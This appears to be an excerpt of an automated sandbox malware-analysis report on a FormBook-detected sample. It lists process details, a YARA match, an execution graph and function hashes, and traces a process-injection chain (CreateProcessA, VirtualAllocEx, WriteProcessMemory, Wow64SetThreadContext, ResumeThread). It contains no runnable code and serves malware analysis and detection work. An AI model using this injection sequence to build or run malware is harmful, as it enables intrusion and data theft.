                                                                                                                                                                              Target ID:8
                                                                                                                                                                              Start time:03:10:25
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe"
                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:03:10:38
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:1.4%
                                                                                                                                                                                Total number of Nodes:219
                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                execution_graph 29123 73069e0 29125 7306a04 29123->29125 29126 7302310 29125->29126 29127 7307728 OutputDebugStringW 29126->29127 29129 73077a7 29127->29129 29129->29125 29130 b153f86 29131 b153f1a 29130->29131 29132 b153e48 29131->29132 29136 b154750 29131->29136 29141 b154798 29131->29141 29147 b154740 29131->29147 29137 b15476a 29136->29137 29153 b154a69 29137->29153 29172 b154a78 29137->29172 29138 b15478e 29138->29132 29142 b1547a6 29141->29142 29143 b15476f 29141->29143 29145 b154a69 12 API calls 29143->29145 29146 b154a78 12 API calls 29143->29146 29144 b15478e 29144->29132 29145->29144 29146->29144 29148 b154717 29147->29148 29149 b15474e 29147->29149 29148->29132 29151 b154a69 12 API calls 29149->29151 29152 b154a78 12 API calls 29149->29152 29150 b15478e 29150->29132 29151->29150 29152->29150 29154 b154a8d 29153->29154 29155 b154a9f 29154->29155 29191 b154c37 29154->29191 29196 b1552a9 29154->29196 29201 b15532c 29154->29201 29206 b154da3 29154->29206 29210 b154f41 29154->29210 29215 b155384 29154->29215 29219 b1551ba 29154->29219 29223 b15525b 29154->29223 29227 b154c5e 29154->29227 29232 b154b9e 29154->29232 29237 b15509e 29154->29237 29243 b154d1f 29154->29243 29248 b154fbd 29154->29248 29253 b155053 29154->29253 29258 b155451 29154->29258 29262 b154b96 29154->29262 29155->29138 29173 b154a8d 29172->29173 29174 b154a9f 29173->29174 29175 b154c37 2 API calls 29173->29175 29176 b154b96 2 API calls 29173->29176 29177 b155451 2 API calls 29173->29177 29178 b155053 2 API calls 29173->29178 29179 b154fbd 2 API calls 29173->29179 29180 b154d1f 2 API calls 29173->29180 29181 b15509e 2 API calls 29173->29181 29182 b154b9e 2 API calls 29173->29182 29183 b154c5e 2 API calls 29173->29183 29184 b15525b 2 API calls 29173->29184 29185 b1551ba 2 API calls 29173->29185 29186 b155384 2 API calls 29173->29186 29187 b154f41 2 API calls 29173->29187 29188 b154da3 2 API calls 29173->29188 29189 b15532c 2 API calls 29173->29189 29190 b1552a9 2 API calls 29173->29190 29174->29138 29175->29174 29176->29174 29177->29174 29178->29174 29179->29174 29180->29174 29181->29174 29182->29174 29183->29174 29184->29174 29185->29174 29186->29174 29187->29174 29188->29174 29189->29174 29190->29174 29192 b154bad 29191->29192 29267 b1538d5 29192->29267 29271 b1538e0 29192->29271 29197 b155077 29196->29197 29275 b153598 29197->29275 29279 b153590 29197->29279 29198 b1554a8 29202 b155332 29201->29202 29283 b153651 29202->29283 29287 b153658 29202->29287 29203 b155364 29208 b153651 WriteProcessMemory 29206->29208 29209 b153658 WriteProcessMemory 29206->29209 29207 b154dd1 29207->29155 29208->29207 29209->29207 29211 b154d36 29210->29211 29212 b154cbe 29211->29212 29291 b153410 29211->29291 29295 b153408 29211->29295 29212->29155 29299 b1534c0 29215->29299 29303 b1534b8 29215->29303 29216 b15539e 29307 b153740 29219->29307 29311 b153748 29219->29311 29220 b155164 29220->29155 29225 b153651 WriteProcessMemory 29223->29225 29226 b153658 WriteProcessMemory 29223->29226 29224 b15527f 29225->29224 29226->29224 29228 b154c55 29227->29228 29228->29155 29230 b1538d5 CreateProcessA 29228->29230 29231 b1538e0 CreateProcessA 29228->29231 29229 b154c93 29229->29155 29230->29229 29231->29229 29233 b154b95 29232->29233 29233->29155 29235 b1538d5 CreateProcessA 29233->29235 29236 b1538e0 CreateProcessA 29233->29236 29234 b154c93 29234->29155 29235->29234 29236->29234 29238 b155343 29237->29238 29239 b15544a 29238->29239 29241 b153651 WriteProcessMemory 29238->29241 29242 b153658 WriteProcessMemory 29238->29242 29239->29155 29240 b155364 29241->29240 29242->29240 29244 b154d25 29243->29244 29246 b153410 ResumeThread 29244->29246 29247 b153408 ResumeThread 29244->29247 29245 b154cbe 29245->29155 29246->29245 29247->29245 29249 b154edb 29248->29249 29249->29248 29251 b153590 VirtualAllocEx 29249->29251 29252 b153598 VirtualAllocEx 29249->29252 29250 b1554a8 29251->29250 29252->29250 29254 b155059 29253->29254 29256 b153590 VirtualAllocEx 29254->29256 29257 b153598 VirtualAllocEx 29254->29257 29255 b1554a8 29256->29255 29257->29255 29260 b1534c0 Wow64SetThreadContext 29258->29260 29261 b1534b8 Wow64SetThreadContext 29258->29261 29259 b15546b 29260->29259 29261->29259 29263 b154bad 29262->29263 29265 b1538d5 CreateProcessA 29263->29265 29266 b1538e0 CreateProcessA 29263->29266 29264 b154c93 29264->29155 29265->29264 29266->29264 29268 b1538e0 CreateProcessA 29267->29268 29270 b153b2b 29268->29270 29272 b153969 CreateProcessA 29271->29272 29274 b153b2b 29272->29274 29276 b1535d8 VirtualAllocEx 29275->29276 29278 b153615 29276->29278 29278->29198 29280 b153599 VirtualAllocEx 29279->29280 29282 b153615 29280->29282 29282->29198 29284 b153658 WriteProcessMemory 29283->29284 29286 b1536f7 29284->29286 29286->29203 29288 b1536a0 WriteProcessMemory 29287->29288 29290 b1536f7 29288->29290 29290->29203 29292 b153450 ResumeThread 29291->29292 29294 b153481 29292->29294 29294->29212 29296 b153410 ResumeThread 29295->29296 29298 b153481 29296->29298 29298->29212 29300 b153505 Wow64SetThreadContext 29299->29300 29302 b15354d 29300->29302 29302->29216 29304 b1534c0 Wow64SetThreadContext 29303->29304 29306 b15354d 29304->29306 29306->29216 29308 b153748 ReadProcessMemory 29307->29308 29310 b1537d7 29308->29310 29310->29220 29312 b153793 ReadProcessMemory 29311->29312 29314 b1537d7 29312->29314 29314->29220 29315 284ac90 29318 284ad88 29315->29318 29316 284ac9f 29319 284ad99 29318->29319 29320 284adbc 29318->29320 29319->29320 29321 284afc0 GetModuleHandleW 29319->29321 29320->29316 29322 284afed 29321->29322 29322->29316 29323 284d420 29324 284d466 GetCurrentProcess 29323->29324 29326 284d4b1 29324->29326 29327 284d4b8 GetCurrentThread 29324->29327 29326->29327 29328 284d4f5 GetCurrentProcess 29327->29328 29329 284d4ee 29327->29329 29330 284d52b 29328->29330 29329->29328 29331 284d553 GetCurrentThreadId 29330->29331 29332 284d584 29331->29332 29116 b155990 29117 b155b1b 29116->29117 29119 b1559b6 29116->29119 29119->29117 29120 b151d60 29119->29120 29121 b155c10 PostMessageW 29120->29121 29122 b155c7c 29121->29122 29122->29119 29333 7302358 29334 7302364 29333->29334 29338 7305168 29334->29338 29343 7305158 29334->29343 29335 7302375 29339 7305184 29338->29339 29348 73060a0 29339->29348 29353 7306090 29339->29353 29340 730522e 29340->29335 29344 7305168 29343->29344 29346 73060a0 NtQueryInformationProcess 29344->29346 29347 7306090 NtQueryInformationProcess 29344->29347 29345 730522e 29345->29335 29346->29345 29347->29345 29349 73060b2 29348->29349 29358 73060e0 29349->29358 29363 73060d0 29349->29363 29350 73060c6 29350->29340 29354 73060a0 29353->29354 29356 73060e0 NtQueryInformationProcess 29354->29356 29357 73060d0 NtQueryInformationProcess 29354->29357 29355 73060c6 29355->29340 29356->29355 29357->29355 29359 73060fa 29358->29359 29368 73061b0 29359->29368 29372 73061a1 29359->29372 29360 730611d 29360->29350 29364 73060e0 29363->29364 29366 73061b0 NtQueryInformationProcess 29364->29366 29367 73061a1 NtQueryInformationProcess 29364->29367 29365 730611d 29365->29350 29366->29365 29367->29365 29369 73061d4 29368->29369 29376 7302294 29369->29376 29373 73061b0 29372->29373 29374 7302294 NtQueryInformationProcess 29373->29374 29375 730625b 29374->29375 29375->29360 29377 7306310 NtQueryInformationProcess 29376->29377 29379 730625b 29377->29379 29379->29360 29380 2844668 29381 284467a 29380->29381 29382 2844686 29381->29382 29384 2844778 29381->29384 29385 284479d 29384->29385 29389 2844888 29385->29389 29393 2844878 29385->29393 29391 28448af 29389->29391 29390 284498c 29390->29390 29391->29390 29397 28444e4 29391->29397 29395 28448af 29393->29395 29394 284498c 29394->29394 29395->29394 29396 28444e4 CreateActCtxA 29395->29396 29396->29394 29398 2845918 CreateActCtxA 29397->29398 29400 28459db 29398->29400 29401 284d668 DuplicateHandle 29402 284d6fe 29401->29402

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 07302294 Relevance: 1.6, APIs: 1, Instructions: 58nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0730638F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                • Opcode ID: 1652e9d8e496f8cb0b9ed5b9937b5d41f8cb6ad84f5df9c62ee1ac899cbd0ad0
                                                                                                                                                                                • Instruction ID: 2df6196b95f2d3d27280547593e84f055005f6d52130e981f2217592030ed68d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1652e9d8e496f8cb0b9ed5b9937b5d41f8cb6ad84f5df9c62ee1ac899cbd0ad0
                                                                                                                                                                                • Instruction Fuzzy Hash: B121EFB5900259EFCB10CF9AD885ADEFBF4FB48320F10842AE958A7250D375A950CFA4
                                                                                                                                                                                Function 07306308 Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0730638F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationProcessQuery
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1778838933-0
                                                                                                                                                                                • Opcode ID: 96794f478def6e82c7440285228a9b6288018f7990c3a8a4b71a6c165897feb3
                                                                                                                                                                                • Instruction ID: 5661ec2ee9eea406412fc86ee99f71d30ba44a277ec4c6eb4b07bda5ebf7336e
                                                                                                                                                                                • Opcode Fuzzy Hash: 96794f478def6e82c7440285228a9b6288018f7990c3a8a4b71a6c165897feb3
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F21E0B5900259EFCB10CF9AD885ADEFFF4FB48320F10882AE958A7250D375A550CFA5
                                                                                                                                                                                Function 07303658 Relevance: .5, Instructions: 506COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 544ec78f105a372ca54b9a730ac3506af1c06c8339b0fb0e71057c911ad16330
                                                                                                                                                                                • Instruction ID: d71d3a5e2afd7c59d02269201ae7ed616b0dfbf21fc1d100ddb9aef1aff39df0
                                                                                                                                                                                • Opcode Fuzzy Hash: 544ec78f105a372ca54b9a730ac3506af1c06c8339b0fb0e71057c911ad16330
                                                                                                                                                                                • Instruction Fuzzy Hash: BE4291B4E11219CFDB54CFA9D984B9DBBB2FF48310F1481A9E809A7395D734AA81CF50
                                                                                                                                                                                Function 07302388 Relevance: .5, Instructions: 482COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4404a962f6e8edd83f07cf2fdd84da1a3d6180bfafe259086be4253ea1baa316
                                                                                                                                                                                • Instruction ID: 8e45936fdf1594badaabb30b748d46aab3a4852345aeed8c55dd965f6e5abdb6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4404a962f6e8edd83f07cf2fdd84da1a3d6180bfafe259086be4253ea1baa316
                                                                                                                                                                                • Instruction Fuzzy Hash: CA32E3B4901219CFEB54DF99C588A8EFBF2BF48315F55D195E408AB212DB30E981CFA4
                                                                                                                                                                                Function 0B156BB0 Relevance: .4, Instructions: 397COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 92faed695e4cf598882eb9fab01fd41bbf28e46e911168cdea4e31045c992d1f
                                                                                                                                                                                • Instruction ID: 8c54b43d191ffb92a07d83747908c02a406bc79016435df132daf10e774ff5bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 92faed695e4cf598882eb9fab01fd41bbf28e46e911168cdea4e31045c992d1f
                                                                                                                                                                                • Instruction Fuzzy Hash: 00E1DA74B01204CFDB29DB69C860BAEB7FAAF89301F90846DD955DB294CF35E901CB91
                                                                                                                                                                                Function 07303649 Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cea667ab9ad7f9bdd92669e6ac9fb62abb95cba15da03eb216ee2583801ca2de
                                                                                                                                                                                • Instruction ID: 6cff10e9e23783f332f0eebddb17662ad1f3fd6619ce6ef82e377760ff381947
                                                                                                                                                                                • Opcode Fuzzy Hash: cea667ab9ad7f9bdd92669e6ac9fb62abb95cba15da03eb216ee2583801ca2de
                                                                                                                                                                                • Instruction Fuzzy Hash: 4461BAB5D11218CFEB14CF5AD995B9DBBB2FF88300F1481A9E809AB354D7359941CF50
                                                                                                                                                                                Function 07309D60 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ebe0a907486fe7a617b4def0fa3253ac71e4d41ba850c94b3031ddc41c3ca83b
                                                                                                                                                                                • Instruction ID: 3f16af9a27913f5e4c44038797f12e2ffa9ff0f492d077ece1ba2c76c7faa2d7
                                                                                                                                                                                • Opcode Fuzzy Hash: ebe0a907486fe7a617b4def0fa3253ac71e4d41ba850c94b3031ddc41c3ca83b
                                                                                                                                                                                • Instruction Fuzzy Hash: C35191B5D012199FDB08CFEAD8446EEFBB2FF89300F10802AE419AB255DB345946CF50
                                                                                                                                                                                Function 07302378 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a2cc03e486eacab277faafce3531be3e0ef9b7739af4ffef4437c1a9bb7591d0
                                                                                                                                                                                • Instruction ID: 4307d32fcfb0a0c5cb127b64c70e19a6c34b772295fd4c49b6e81ef6501a6af9
                                                                                                                                                                                • Opcode Fuzzy Hash: a2cc03e486eacab277faafce3531be3e0ef9b7739af4ffef4437c1a9bb7591d0
                                                                                                                                                                                • Instruction Fuzzy Hash: AD41FAB0E006198FEB58CF6AC84179EBBB3BF88300F14C0A5D55CA7254EB300A458F51
                                                                                                                                                                                Function 07309D50 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1751725139.0000000007300000.00000040.00000800.00020000.00000000.sdmp, Offset: 07300000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7300000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b66b4062fa6d45333ed6f14156822abafbb9c16cccab41d355302ffb4c2f360
                                                                                                                                                                                • Instruction ID: 7d320b1191628590c7f28471d87baf1bf8ff2daac13e63ed8350bd035641ae0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b66b4062fa6d45333ed6f14156822abafbb9c16cccab41d355302ffb4c2f360
                                                                                                                                                                                • Instruction Fuzzy Hash: 0141A3B5E046199FDB08CFEAC8856AEFBF6BF88300F14C02AD419AB255DB345946CF40
                                                                                                                                                                                Function 0284D411 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 297 284d411-284d4af GetCurrentProcess 301 284d4b1-284d4b7 297->301 302 284d4b8-284d4ec GetCurrentThread 297->302 301->302 303 284d4f5-284d529 GetCurrentProcess 302->303 304 284d4ee-284d4f4 302->304 305 284d532-284d54d call 284d5f0 303->305 306 284d52b-284d531 303->306 304->303 310 284d553-284d582 GetCurrentThreadId 305->310 306->305 311 284d584-284d58a 310->311 312 284d58b-284d5ed 310->312 311->312
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0284D49E
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0284D4DB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0284D518
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0284D571
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: aaf33a17e2f19e8506d495b686152cd3e7fedce94e52adefac50c3a38e3367c1
                                                                                                                                                                                • Instruction ID: 495140beee2e2fb2723fae4d8079a32e4d1ea36f05c83a2e1fd8cba54714a98c
                                                                                                                                                                                • Opcode Fuzzy Hash: aaf33a17e2f19e8506d495b686152cd3e7fedce94e52adefac50c3a38e3367c1
                                                                                                                                                                                • Instruction Fuzzy Hash: C05168B49002098FDB18DFAAD54879EBBF1FF48304F20C459E419A72A0DB74A984CF65
                                                                                                                                                                                Function 0284D420 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 319 284d420-284d4af GetCurrentProcess 323 284d4b1-284d4b7 319->323 324 284d4b8-284d4ec GetCurrentThread 319->324 323->324 325 284d4f5-284d529 GetCurrentProcess 324->325 326 284d4ee-284d4f4 324->326 327 284d532-284d54d call 284d5f0 325->327 328 284d52b-284d531 325->328 326->325 332 284d553-284d582 GetCurrentThreadId 327->332 328->327 333 284d584-284d58a 332->333 334 284d58b-284d5ed 332->334 333->334
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0284D49E
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0284D4DB
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0284D518
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0284D571
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1746749603.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2840000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: a340acbf0f2feb5a76253419ed34733182d3ff40bdb4368d4aaf56fba67a83ce
                                                                                                                                                                                • Instruction ID: 6d342ca302f1cec5904e8416830f08e820a00f971a34f1a908e72429933b9aa1
                                                                                                                                                                                • Opcode Fuzzy Hash: a340acbf0f2feb5a76253419ed34733182d3ff40bdb4368d4aaf56fba67a83ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A5158B49002098FDB14DFAAD548B9EBBF1FF48318F20C459E419A7360DB74A984CF65
                                                                                                                                                                                Function 0B1538D5 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 671 b1538d5-b153975 674 b153977-b153981 671->674 675 b1539ae-b1539ce 671->675 674->675 676 b153983-b153985 674->676 680 b153a07-b153a36 675->680 681 b1539d0-b1539da 675->681 678 b153987-b153991 676->678 679 b1539a8-b1539ab 676->679 682 b153995-b1539a4 678->682 683 b153993 678->683 679->675 691 b153a6f-b153b29 CreateProcessA 680->691 692 b153a38-b153a42 680->692 681->680 684 b1539dc-b1539de 681->684 682->682 685 b1539a6 682->685 683->682 686 b153a01-b153a04 684->686 687 b1539e0-b1539ea 684->687 685->679 686->680 689 b1539ec 687->689 690 b1539ee-b1539fd 687->690 689->690 690->690 693 b1539ff 690->693 703 b153b32-b153bb8 691->703 704 b153b2b-b153b31 691->704 692->691 694 b153a44-b153a46 692->694 693->686 695 b153a69-b153a6c 694->695 696 b153a48-b153a52 694->696 695->691 698 b153a54 696->698 699 b153a56-b153a65 696->699 698->699 699->699 700 b153a67 699->700 700->695 714 b153bc8-b153bcc 703->714 715 b153bba-b153bbe 703->715 704->703 717 b153bdc-b153be0 714->717 718 b153bce-b153bd2 714->718 715->714 716 b153bc0 715->716 716->714 720 b153bf0-b153bf4 717->720 721 b153be2-b153be6 717->721 718->717 719 b153bd4 718->719 719->717 723 b153c06-b153c0d 720->723 724 b153bf6-b153bfc 720->724 721->720 722 b153be8 721->722 722->720 725 b153c24 723->725 726 b153c0f-b153c1e 723->726 724->723 728 b153c25 725->728 726->725 728->728
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0B153B16
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.1752603837.000000000B150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B150000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_b150000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: 7059a13de2d5ef424842d4c37d84bac2b7012bbac7e81531331b5a95a751dc7d
                                                                                                                                                                                • Instruction ID: a51477fee39c3f0d1d92a1d105541028ffa51dde03d790c8947b7cea97e28536
                                                                                                                                                                                • Opcode Fuzzy Hash: 7059a13de2d5ef424842d4c37d84bac2b7012bbac7e81531331b5a95a751dc7d
                                                                                                                                                                                • Instruction Fuzzy Hash: ACA16B71D00219DFDB20CFA8D841BEDBBB2FF48310F1485A9E869A7250DB749985CF96
                                                                                                                                                                                Function 0B1538E0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 729 b1538e0-b153975 731 b153977-b153981 729->731 732 b1539ae-b1539ce 729->732 731->732 733 b153983-b153985 731->733 737 b153a07-b153a36 732->737 738 b1539d0-b1539da 732->738 735 b153987-b153991 733->735 736 b1539a8-b1539ab 733->736 739 b153995-b1539a4 735->739 740 b153993 735->740 736->732 748 b153a6f-b153b29 CreateProcessA 737->748 749 b153a38-b153a42 737->749 738->737 741 b1539dc-b1539de 738->741 739->739 742 b1539a6 739->742 740->739 743 b153a01-b153a04 741->743 744 b1539e0-b1539ea 741->744 742->736 743->737 746 b1539ec 744->746 747 b1539ee-b1539fd 744->747 746->747 747->747 750 b1539ff 747->750 760 b153b32-b153bb8 748->760 761 b153b2b-b153b31 748->761 749->748 751 b153a44-b153a46 749->751 750->743 752 b153a69-b153a6c 751->752 753 b153a48-b153a52 751->753 752->748 755 b153a54 753->755 756 b153a56-b153a65 753->756 755->756 756->756 757 b153a67 756->757 757->752 771 b153bc8-b153bcc 760->771 772 b153bba-b153bbe 760->772 761->760 774 b153bdc-b153be0 771->774 775 b153bce-b153bd2 771->775 772->771 773 b153bc0 772->773 773->771 777 b153bf0-b153bf4 774->777 778 b153be2-b153be6 774->778 775->774 776 b153bd4 775->776 776->774 780 b153c06-b153c0d 777->780 781 b153bf6-b153bfc 777->781 778->777 779 b153be8 778->779 779->777 782 b153c24 780->782 783 b153c0f-b153c1e 780->783 781->780 785 b153c25 782->785 783->782 785->785
                                                                                                                                                                                APIs
